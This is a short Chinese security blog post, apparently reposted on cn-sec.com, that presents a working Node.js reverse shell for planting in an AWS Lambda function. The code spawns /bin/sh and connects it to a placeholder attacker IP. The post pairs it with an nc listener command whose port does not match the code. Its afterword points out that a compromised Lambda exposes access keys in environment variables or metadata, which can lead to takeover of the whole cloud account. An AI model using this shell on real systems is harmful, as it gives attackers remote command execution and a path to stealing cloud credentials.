AWS Lambda Node.js 反弹shell

admin 2024年1月5日22:46:41AWS Lambda Node.js 反弹shell已关闭评论19 views字数 499阅读1分39秒阅读模式

Nov 19, 2019

0x00 前言

原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。

0x01 被攻击端

直接套到lambda函数里就行了

1
2
3
4
5
6
7
8
9
10
11
12
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "此处替换为攻击端IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();

0x02 攻击端

1
nc -lvnp 8820

image

0x03 后记

这就就是云服务接管比直接的服务器被控的危害更大,就是可以在环境变量或者元数据中拿AKSK,然后权限配置不当的话,可以直接控了整个云账号了。

0x04 参考链接

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月5日22:46:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AWS Lambda Node.js 反弹shellhttps://cn-sec.com/archives/2369694.html